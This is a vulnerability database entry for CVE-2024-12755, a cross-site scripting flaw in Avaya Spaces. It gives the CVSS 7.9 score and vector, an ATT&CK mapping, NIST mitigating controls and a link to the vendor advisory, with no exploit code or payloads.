CVE-2024-12755
Published: 11 February 2025
Summary
CVE-2024-12755 is a high-severity Cross-site Scripting (CWE-79) vulnerability in Avaya Spaces. Its CVSS base score is 7.9 (High).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked at the 21.4th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).
Deeper analysis
CVE-2024-12755 is a Cross-Site Scripting (XSS) vulnerability, classified under CWE-79, affecting Avaya Spaces. Published on 2025-02-11, it may allow unauthorized code execution and potential disclosure of sensitive information. The vulnerability has a CVSS v3.1 base score of 7.9 (AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:L).
The attack requires network access with high complexity, low attacker privileges, and user interaction. A low-privileged user could exploit it to execute unauthorized code in the context of another user's browser, achieving high impacts on confidentiality and integrity, along with low availability impact due to the changed scope.
Mitigation details are provided in the Avaya advisory at https://support.avaya.com/css/public/documents/101091836.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2024-51090
Vulnerability details
A Cross-Site Scripting (XSS) vulnerability in Avaya Spaces may have allowed unauthorized code execution and potential disclose of sensitive information.
- CWE(s)
Related Threats
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
Stored/reflected XSS in public-facing web app directly enables arbitrary JavaScript execution in victim browser context.
CVEs Like This One
Affected Assets
Mitigating Controls
Mitigating Controls (NIST 800-53 r5) AI
Directly mitigates the specific XSS vulnerability in Avaya Spaces by requiring timely identification, prioritization, and remediation of the flaw to prevent exploitation.
Prevents XSS attacks by validating and sanitizing untrusted user inputs before processing, addressing the root cause of code injection in Avaya Spaces.
Neutralizes XSS payloads by filtering and encoding outputs sent to user browsers, blocking unauthorized code execution and sensitive information disclosure.